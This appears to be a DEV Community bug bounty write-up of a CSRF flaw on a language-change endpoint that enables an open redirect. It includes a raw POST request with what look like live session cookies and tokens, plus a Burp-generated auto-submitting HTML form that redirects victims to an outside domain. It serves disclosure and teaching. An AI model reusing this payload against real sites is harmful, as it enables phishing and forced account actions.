DEV Community

João Victor
João Victor

Posted on

CSRF leads to Open redirect

Reward: 15$

Overview of the Vulnerability
Open redirects occur when an application accepts user input that is not validated into the target of a redirection. This input causes a redirection to an external domain, manipulating a user by redirecting them to a malicious site. An open redirect was identified which can impact users' ability to trust legitimate web pages. An attacker can send a phishing email that contains a link with a legitimate business name in the URL and the user will be redirected from the legitimate web server to any external domain. Users are less likely to notice subsequent redirects to different domains when an authentic URL with a valid SSL certificate can be used within the phishing link.
This type of attack is also a precursor for more serious vulnerabilities such as Cross-Site Scripting (XSS), Server-Side Request Forgery (SSRF), Cross-Site Request Forgery (CSRF), or successful phishing attempts where an attacker can harvest users' credentials or gain users' OAuth access by relaying them through an Open Redirection, to a server they control (and can see the inbound requests from).

Business Impact
Open redirects can result in reputational damage for the business as customers' trust is negatively impacted by an attacker sending them to a phishing site to extract login credentials, or coercing them to send a financial transaction.

Steps to Reproduce
Copy and paste the request below into the burp suite using the "Generate CSRF Poc" functionality, create an HTML page and access it via browser (with the same burp proxy)

Request

POST /account/change_language HTTP/2
Host: site.com
Cookie: anon-device-id=4c27c635-6a6f-488f-b9a2-9f29173ff515; __cf_bm=Rac7hxpK8o94OYuHBu0gHix5xW0o11y2VhCwxxB_FR4-1707166647-1-AY6CLDec/7yODhPtCT3RC8iWE1Y6m7OqSf1VTqUO7pToGWcrBI9nnOYtOtQ1q4IiaLJ/vu3GKRnCEJyPWMrGaEw=; _mfp_session=kBbELYGofqGXJmZg0zIGaRo5jp7GSfjdTL6s34tbquYJoS4J1VYF1cPZkd6x2Z4xx8R7OKNpX6OJOndQS%2BN4G%2By0pbfitT5oXfov74Cp89zjaFAtX5s7ER0iMSrpbLnlK2jKRHxyusVX2AvU9v5fGc5ApZM4PL3NNdNsmqcxawJcMInSweGvPuOyFMPVYZnsSvkvWS0ARSviiGtwV%2BVM3LlRaG%2F4TgfDEiovbD%2BaszqwpTJntbX9%2Bb%2F3KjwFwitYeifofA8tvKjngXhky36cBVNBDhaToZwxIFnHZp07zLv%2FaHWEKJV4aV11Y3hT%2FGzfJrJjttWtMJicou7FDNX3eXmHhUkJ8zDX22eLGUVTu6w%3D--6me1Z0vPivn%2BoJTV--XkmHgGy679Gl%2FKNsddY7Cw%3D%3D; __Host-next-auth.csrf-token=a139928ae57b8911a5892a7866026aa63815d65196e4e5c6218aaceabb9d4c8d%7C4c4e2344fbf4063da52b2f3ec8315251ff45a9a1bf6e3dfa6018aa87d031a820; __Secure-next-auth.callback-url=https%3A%2F%2Fwww.myfitnesspal.com; AMP_MKTG_2746a27a28=JTdCJTdE; sp_gam_npa=false; dnsDisplayed=undefined; ccpaApplies=true; signedLspa=undefined; _sp_su=false; cf_clearance=xKv4h6PVvCdNz7Ru5gaJgKtAYmWXoaflj0xDqSOggT0-1707166524-1-AWvQd7Iq4gjsZKptQAw3Q+5trsYPEFKOazWRqcbbdG7Z5Wurf9+pCIlWRXfiNiuMG3qUKUj2euDmAeHb2mor0To=; AMP_2746a27a28=JTdCJTIyZGV2aWNlSWQlMjIlM0ElMjJlNWQwMzQ0My0yZTdmLTQ0YmItOTRlNy0zMjllNDI1NGNjZTAlMjIlMkMlMjJzZXNzaW9uSWQlMjIlM0ExNzA3MTY2NTIwNjEwJTJDJTIyb3B0T3V0JTIyJTNBZmFsc2UlMkMlMjJsYXN0RXZlbnRUaW1lJTIyJTNBMTcwNzE2NjU0NTAxMSUyQyUyMmxhc3RFdmVudElkJTIyJTNBNSU3RA==; ccpaConsentAll=true; ccpaReject=false; consentStatus=consentedAll; ccpaUUID=215fdb39-e2eb-4b5e-9042-6f2987093e4b; consentUUID=05f64a74-d7ed-4569-8d6d-303333bf8b4b; _dd_s=logs=0&expire=1707167476513&rum=2&id=fb0f58b6-9182-4e3e-92d0-04445647a54f&created=1707166516408; language_setting=en
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36

authenticity_token=%2BpU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN%2BdztJQjvJuWkCsTOPQ==&originating_path=http://www.c4ng4c31r0.com%3F&preference[language_setting]=en
Enter fullscreen mode Exit fullscreen mode

CSRF HTML

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://site.com/account/change_language" method="POST">
      <input type="hidden" name="authenticity&#95;token" value="&#43;pU4FL6cJuhgBhPzLu2rrTP0n31B1KCplGXuHxvJf7spxrsiuxYbyy3sxYU5YyKZ3EJN&#43;dztJQjvJuWkCsTOPQ&#61;&#61;" />
      <input type="hidden" name="originating&#95;path" value="http&#58;&#47;&#47;www&#46;c4ng4c31r0&#46;com" />
      <input type="hidden" name="preference&#91;language&#95;setting&#93;" value="en" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Enter fullscreen mode Exit fullscreen mode

PoC:

Image description

Generation CSRF PoC

Image description

Acessing URL generated with PoC

Image description

Redirecting

Image description

Reward/Status:

Image description

Top comments (0)